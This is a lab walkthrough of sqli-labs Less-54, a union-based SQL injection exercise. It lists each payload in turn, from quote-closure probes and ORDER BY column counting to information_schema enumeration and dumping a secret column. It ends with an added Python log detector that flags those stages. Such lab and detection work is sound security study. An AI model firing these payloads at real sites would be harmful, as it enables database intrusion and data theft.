SQL injection Less54 (limited number of SQL injection + union injection)
2022-07-31 22:52:00 【HUAWEI CLOUD】

SQL injection with a limited number of attempts
On each reset, the database's table name, field names and data change.
?id=1
?id=1'
No error message is shown.
?id=1"
The echo is normal with the double quote, so go straight to checking the closing method:
?id=1'--+
?id=1')--+
?id=1'))--+
The single quote on its own echoes normally, so the parameter is closed by a single quote.
?id=1' order by 3--+ (the echo is normal)
?id=1' order by 4--+ (the echo is wrong)
So there are three columns.
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
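
The request sequence above as it looks from the defender's side, as an added example that is not part of the original post: it classifies the `id` parameter of each logged request into the stages the walkthrough goes through (closure probe, ORDER BY column count, UNION SELECT, information_schema enumeration) and flags a client that moves from column counting to UNION. The log format, the `/less54/` path and the IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Stages of the union-based workflow, most specific pattern first.
STAGES = [
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("closure_probe", re.compile(r"['\"]\)*\s*(--\s|#|$)")),
]
# Assumed (constructed) access-log layout: <ip> "GET <target> HTTP/x.y" <status>
LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d{3}$')

# Constructed sample log lines; none of this is real traffic.
SAMPLE_LOG = [
    '203.0.113.7 "GET /less54/?id=1 HTTP/1.1" 200',
    '203.0.113.7 "GET /less54/?id=1%27 HTTP/1.1" 200',
    '203.0.113.7 "GET /less54/?id=1%27--+ HTTP/1.1" 200',
    '203.0.113.7 "GET /less54/?id=1%27+order+by+4--+ HTTP/1.1" 200',
    '203.0.113.7 "GET /less54/?id=-1%27+union+select+1,version(),database()--+ HTTP/1.1" 200',
    '198.51.100.9 "GET /less54/?id=2 HTTP/1.1" 200',
]

def classify(value):
    """Return the first matching stage name for one decoded parameter value."""
    for name, rx in STAGES:
        if rx.search(value):
            return name
    return None

def analyze(lines, param="id"):
    """Map client IP -> list of stages seen, in request order."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the assumed format
        ip, target = m.groups()
        # parse_qs percent-decodes and turns '+' into a space, so "--+" becomes "-- "
        for value in parse_qs(urlsplit(target).query).get(param, []):
            stage = classify(value)
            if stage:
                seen[ip].append(stage)
    return dict(seen)

def escalated(stages):
    """True if column counting was followed by UNION SELECT or schema enumeration."""
    later = stages[stages.index("column_count") + 1:] if "column_count" in stages else []
    return any(s in ("union_select", "schema_enum") for s in later)
```

A lone trailing quote also matches `closure_probe`, so that stage alone is a weak signal; the ordered combination checked by `escalated` is the one worth alerting on.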
